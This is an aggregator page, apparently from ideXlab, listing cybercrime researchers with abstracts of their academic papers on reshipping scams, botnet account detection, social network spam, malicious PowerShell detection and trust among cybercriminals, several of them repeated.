The Experts below are selected from a list of 3402 Experts worldwide ranked by ideXlab platform
Giovanni Vigna - One of the best experts on this subject based on the ideXlab platform.
-
ACM Conference on Computer and Communications Security - Drops for Stuff: An Analysis of Reshipping Mule Scams
Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015Co-Authors: Shuang Hao, Gianluca Stringhini, Kevin Borgolte, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni VignaAbstract:Credit card fraud has seen rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to Cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, Cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction are reshipping scams. In such scams, Cybercriminals purchase high-value or highly-demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the Cybercriminals, most of whom are located overseas. Once the goods reach the Cybercriminals, they are then resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.
-
drops for stuff an analysis of reshipping mule scams
Computer and Communications Security, 2015Co-Authors: Kevin Borgolte, Gianluca Stringhini, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni VignaAbstract:Credit card fraud has seen rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to Cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, Cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction are reshipping scams. In such scams, Cybercriminals purchase high-value or highly-demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the Cybercriminals, most of whom are located overseas. Once the goods reach the Cybercriminals, they are then resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.
-
USENIX Security Symposium - EVILCOHORT: detecting communities of malicious accounts on online services
2015Co-Authors: Gianluca Stringhini, Manuel Egele, Pierre Mourlanne, Grégoire Jacob, Christopher Kruegel, Giovanni VignaAbstract:Cybercriminals misuse accounts on online services (e.g., webmails and online social networks) to perform malicious activity, such as spreading malicious content or stealing sensitive information. In this paper, we show that accounts that are accessed by botnets are a popular choice by Cybercriminals. Since botnets are composed of a finite number of infected computers, we observe that Cybercriminals tend to have their bots connect to multiple online accounts to perform malicious activity. We present EVILCOHORT, a system that detects online accounts that are accessed by a common set of infected machines. EVILCOHORT only needs the mapping between an online account and an IP address to operate, and can therefore detect malicious accounts on any online service (webmail services, online social networks, storage services) regardless of the type of malicious activity that these accounts perform. Unlike previous work, our system can identify malicious accounts that are controlled by botnets but do not post any malicious content (e.g., spam) on the service. We evaluated EVILCOHORT on multiple online services of different types (a webmail service and four online social networks), and show that it accurately identifies malicious accounts.
-
Detecting spammers on social networks
Proceedings - Annual Computer Security Applications Conference ACSAC, 2010Co-Authors: Giovanni VignaAbstract:Social networking has become a popular way for users to meet and interact online. Users spend a significant amount of time on popular social network platforms (such as Facebook, MySpace, or Twitter), storing and sharing a wealth of personal information. This information, as well as the possibility of contacting thousands of users, also attracts the interest of Cybercriminals. For example, Cybercriminals might exploit the implicit trust relationships between users in order to lure victims to malicious websites. As another example, Cybercriminals might find personal information valuable for identity theft or to drive targeted spam campaigns. In this paper, we analyze to which extent spam has entered social networks. More precisely, we analyze how spammers who target social networking sites operate. To collect the data about spamming activity, we created a large and diverse set of "honey-profiles" on three large social networking sites, and logged the kind of contacts and messages that they received. We then analyzed the collected data and identified anomalous behavior of users who contacted our profiles. Based on the analysis of this behavior, we developed techniques to detect spammers in social networks, and we aggregated their messages in large spam campaigns. Our results show that it is possible to automatically identify the accounts used by spammers, and our analysis was used for take-down efforts in a real-world social network. More precisely, during this study, we collaborated with Twitter and correctly detected and deleted 15,857 spam profiles. © 2010 ACM.
Amir Rubin - One of the best experts on this subject based on the ideXlab platform.
-
Detecting Malicious PowerShell Commands using Deep Neural Networks
Proceedings of the 2018 on Asia Conference on Computer and Communications Security, 2018Co-Authors: Danny Hendler, Shay Kels, Amir RubinAbstract:Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. While PowerShell can be configured by administrators for restricting access and reducing vulnerabilities, these restrictions can be bypassed. Moreover, PowerShell commands can be easily generated dynamically, executed from memory, encoded and obfuscated, thus making the logging and forensic analysis of code executed by PowerShell challenging.For all these reasons, PowerShell is increasingly used by Cybercriminals as part of their attacks' tool chain, mainly for downloading malicious contents and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to PowerShell's abuse by cybercrimials reported on a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need of developing effective methods for detecting malicious PowerShell commands.In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). Detectors' performance was evaluated using a large real-world dataset.Our evaluation results show that, although our detectors individually yield high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier provides the best performance, since the latter classifier is able to detect malicious commands that succeed in evading the former. Our analysis of these evasive commands reveals that some obfuscation patterns automatically detected by the CNN classifier are intrinsically difficult to detect using the NLP techniques we applied.
-
AsiaCCS - Detecting Malicious PowerShell Commands using Deep Neural Networks
Proceedings of the 2018 on Asia Conference on Computer and Communications Security - ASIACCS '18, 2018Co-Authors: Danny Hendler, Shay Kels, Amir RubinAbstract:Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. Based on Microsoft's .NET framework, it includes an interface that allows programmers to access operating system services. While PowerShell can be configured by administrators for restricting access and reducing vulnerabilities, these restrictions can be bypassed. Moreover, PowerShell commands can be easily generated dynamically, executed from memory, encoded and obfuscated, thus making the logging and forensic analysis of code executed by PowerShell challenging. For all these reasons, PowerShell is increasingly used by Cybercriminals as part of their attacks' tool chain, mainly for downloading malicious contents and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to PowerShell's abuse by cybercrimials [52] reported on a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need of developing effective methods for detecting malicious PowerShell commands. In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). Detectors' performance was evaluated using a large real-world dataset. Our evaluation results show that, although our detectors (and especially the traditional NLP-based ones) individually yield high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier provides the best performance, since the latter classifier is able to detect malicious commands that succeed in evading the former. Our analysis of these evasive commands reveals that some obfuscation patterns automatically detected by the CNN classifier are intrinsically difficult to detect using the NLP techniques we applied. Our detectors provide high recall values while maintaining a very low false positive rate, making us cautiously optimistic that they can be of practical value.
Yunqing Xia - One of the best experts on this subject based on the ideXlab platform.
-
a probabilistic generative model for mining cybercriminal networks from online social media
IEEE Computational Intelligence Magazine, 2014Co-Authors: Raymond Y. K. Lau, Yunqing XiaAbstract:There has been a rapid growth in the number of cybercrimes that cause tremendous financial loss to organizations. Recent studies reveal that Cybercriminals tend to collaborate or even transact cyber-attack tools via the "dark markets" established in online social media. Accordingly, it presents unprecedented opportunities for researchers to tap into these underground cybercriminal communities to develop better insights about collaborative cybercrime activities so as to combat the ever increasing number of cybercrimes. The main contribution of this paper is the development of a novel weakly supervised cybercriminal network mining method to facilitate cybercrime forensics. In particular, the proposed method is underpinned by a probabilistic generative model enhanced by a novel context-sensitive Gibbs sampling algorithm. Evaluated based on two social media corpora, our experimental results reveal that the proposed method significantly outperforms the Latent Dirichlet Allocation (LDA) based method and the Support Vector Machine (SVM) based method by 5.23% and 16.62% in terms of Area Under the ROC Curve (AUC), respectively. It also achieves comparable performance as the state-of-the-art Partially Labeled Dirichlet Allocation (PLDA) method. To the best of our knowledge, this is the first successful research of applying a probabilistic generative model to mine cybercriminal networks from online social media.
Gianluca Stringhini - One of the best experts on this subject based on the ideXlab platform.
-
WWW (Companion Volume) - BABELTOWER: How Language Affects Criminal Activity in Stolen Webmail Accounts
Companion of the The Web Conference 2018 on The Web Conference 2018 - WWW '18, 2018Co-Authors: Emeric Bernard-jones, Jeremiah Onaolapo, Gianluca StringhiniAbstract:We set out to understand the effects of differing language on the ability of Cybercriminals to navigate webmail accounts and locate sensitive information in them. To this end, we configured thirty Gmail honeypot accounts with English, Romanian, and Greek language settings. We populated the accounts with email messages in those languages by subscribing them to selected online newsletters. We also hid email messages about fake bank accounts in fifteen of the accounts to mimic real-world webmail users that sometimes store sensitive information in their accounts. We then leaked credentials to the honey accounts via paste sites on the Surface Web and the Dark Web, and collected data for fifteen days. Our statistical analyses on the data show that Cybercriminals are more likely to discover sensitive information (bank account information) in the Greek accounts than the remaining accounts, contrary to the expectation that Greek ought to constitute a barrier to the understanding of non-Greek visitors to the Greek accounts. We also extracted the important words among the emails that Cybercriminals accessed (as an approximation of the keywords that they possibly searched for within the honey accounts), and found that financial terms featured among the top words. In summary, we show that language plays a significant role in the ability of Cybercriminals to access sensitive information hidden in compromised webmail accounts.
-
Email Babel: does language affect criminal activity in compromised webmail accounts?
arXiv: Computers and Society, 2017Co-Authors: Emeric Bernard-jones, Jeremiah Onaolapo, Gianluca StringhiniAbstract:We set out to understand the effects of differing language on the ability of Cybercriminals to navigate webmail accounts and locate sensitive information in them. To this end, we configured thirty Gmail honeypot accounts with English, Romanian, and Greek language settings. We populated the accounts with email messages in those languages by subscribing them to selected online newsletters. We hid email messages about fake bank accounts in fifteen of the accounts to mimic real-world webmail users that sometimes store sensitive information in their accounts. We then leaked credentials to the honey accounts via paste sites on the Surface Web and the Dark Web, and collected data for fifteen days. Our statistical analyses on the data show that Cybercriminals are more likely to discover sensitive information (bank account information) in the Greek accounts than the remaining accounts, contrary to the expectation that Greek ought to constitute a barrier to the understanding of non-Greek visitors to the Greek accounts. We also extracted the important words among the emails that Cybercriminals accessed (as an approximation of the keywords that they searched for within the honey accounts), and found that financial terms featured among the top words. In summary, we show that language plays a significant role in the ability of Cybercriminals to access sensitive information hidden in compromised webmail accounts.
-
drops for stuff an analysis of reshipping mule scams
Computer and Communications Security, 2015Co-Authors: Kevin Borgolte, Gianluca Stringhini, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni VignaAbstract:Credit card fraud has seen rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to Cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, Cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction are reshipping scams. In such scams, Cybercriminals purchase high-value or highly-demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the Cybercriminals, most of whom are located overseas. Once the goods reach the Cybercriminals, they are then resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.
-
ACM Conference on Computer and Communications Security - Drops for Stuff: An Analysis of Reshipping Mule Scams
Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015Co-Authors: Shuang Hao, Gianluca Stringhini, Kevin Borgolte, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni VignaAbstract:Credit card fraud has seen rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to Cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, Cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction are reshipping scams. In such scams, Cybercriminals purchase high-value or highly-demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the Cybercriminals, most of whom are located overseas. Once the goods reach the Cybercriminals, they are then resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.
-
USENIX Security Symposium - EVILCOHORT: detecting communities of malicious accounts on online services
2015Co-Authors: Gianluca Stringhini, Manuel Egele, Pierre Mourlanne, Grégoire Jacob, Christopher Kruegel, Giovanni VignaAbstract:Cybercriminals misuse accounts on online services (e.g., webmails and online social networks) to perform malicious activity, such as spreading malicious content or stealing sensitive information. In this paper, we show that accounts that are accessed by botnets are a popular choice by Cybercriminals. Since botnets are composed of a finite number of infected computers, we observe that Cybercriminals tend to have their bots connect to multiple online accounts to perform malicious activity. We present EVILCOHORT, a system that detects online accounts that are accessed by a common set of infected machines. EVILCOHORT only needs the mapping between an online account and an IP address to operate, and can therefore detect malicious accounts on any online service (webmail services, online social networks, storage services) regardless of the type of malicious activity that these accounts perform. Unlike previous work, our system can identify malicious accounts that are controlled by botnets but do not post any malicious content (e.g., spam) on the service. We evaluated EVILCOHORT on multiple online services of different types (a webmail service and four online social networks), and show that it accurately identifies malicious accounts.
Jonathan Lusthaus - One of the best experts on this subject based on the ideXlab platform.
-
Honour Among (Cyber)thieves
European Journal of Sociology, 2018Co-Authors: Jonathan LusthausAbstract:It is well known that criminals, who operate outside the law and the protection of the state, face difficulties in cooperating due both to the requirement of secrecy and a deficit of trust. For Cybercriminals the anonymity of the Internet creates further challenges, making it even more difficult to assess trustworthiness and enforce agreements. Yet, contrary to expectations, collaboration among Cybercriminals is prevalent, and a sophisticated industry has emerged. The purpose of this paper is to address this puzzle in relation to profit-driven cybercrime. It draws on a collection of interviews with former Cybercriminals that provide a valuable form of data on micro-level and often secretive interactions. It examines four key mechanisms that lead to improved cooperation: reputation, appearance, performance and enforcement. It also addresses the rarely discussed, and somewhat counterintuitive, role that offline interactions may play in enhancing collective action among Cybercriminals.
-
Cybercrime: the industry of anonymity
2016Co-Authors: Jonathan LusthausAbstract:The central theme of this thesis is that cybercrime has matured into a large profitdriven industry. Hobby hackers still exist and hacktivists have attracted some attention in recent years, but a very significant component of contemporary cybercrime is now financially motivated. While its goods and services are usually illicit, the cybercrime industry operates according to the same broad principles of industrial organisation observed across numerous other contexts. But the development of this industry is somewhat puzzling. Ostensibly much cybercriminal cooperation takes place online. As a result, Cybercriminals are often partnering with online criminals whose true identities are unknown to them. They also have no means of physical enforcement should deals go awry. Partnering with conventional criminals, who operate outside the protection of the state, already appears to present significant challenges for cooperation. The challenge of anonymity makes cooperation even more difficult and suggests that Cybercriminals would often act alone, or in small groups. Instead a large successful industry has formed. This thesis first addresses the industrialisation of cybercrime. It then addresses this puzzle of how Cybercriminals have overcome the challenges to cooperation to build an industry on such a scale.
-
How organised is organised cybercrime
Global Crime, 2013Co-Authors: Jonathan LusthausAbstract:To some writers and commentators, fully fledged organised cybercrime is currently emerging. Law enforcement spokesmen and Internet security firms have even made comparisons between the structure of cybercriminal enterprises and organisations like La Cosa Nostra. But, in reality, conventional criminal labels applied to cybercrime are themselves often poorly understood by those who employ them. The purpose of this research note is to apply scholarly rigor to the question of whether profit-driven cybercrime can fit underneath formal definitions of organised crime and mafias. It proceeds in three sections: the first section outlines academic definitions of organised crime, mafias and cybercrime; the second section assesses whether online cybercriminal trading forums, perhaps the most visible and documented examples of cybercriminal organisation, might constitute mafias as some contend; the third section briefly discusses some other less documented examples of ‘organised’ cybercrime and assesses the broader possibility of online groups being classified as organised crime groups.
-
How organised is organised cybercrime
Global Crime, 2013Co-Authors: Jonathan LusthausAbstract:To some writers and commentators, fully fledged organised cybercrime is currently emerging. Law enforcement spokesmen and Internet security firms have even made comparisons between the structure of cybercriminal enterprises and organisations like La Cosa Nostra. But, in reality, conventional criminal labels applied to cybercrime are themselves often poorly understood by those who employ them. The purpose of this research note is to apply scholarly rigor to the question of whether profit-driven cybercrime can fit underneath formal definitions of organised crime and mafias. It proceeds in three sections: the first section outlines academic definitions of organised crime, mafias and cybercrime; the second section assesses whether online cybercriminal trading forums, perhaps the most visible and documented examples of cybercriminal organisation, might constitute mafias as some contend; the third section briefly discusses some other less documented examples of ‘organised’ cybercrime and assesses the broader po...
-
trust in the world of cybercrime
Global Crime, 2012Co-Authors: Jonathan LusthausAbstract:For Cybercriminals, the anonymity of the Internet offers not only opportunities but also challenges. Where one does not truly know whom one is doing business with, it makes it difficult to assess trustworthiness or to retaliate should dealings go sour and agreements need to be enforced. This creates a large deficit of trust, beyond even that common among conventional criminals, and makes cybercriminal transactions very unstable. As a result, it might be expected that Cybercriminals would often act alone. But, in reality, Cybercriminals collaborate quite widely. This is the puzzle that this article addresses. In order to overcome the major challenges of online anonymity, and to capitalise on its benefits, Cybercriminals have developed a range of mechanisms that buttress trust. These include mechanisms relating to (1) establishing cybercriminal identities; (2) assessing cybercriminal attributes; and (3) extra-legal governance.
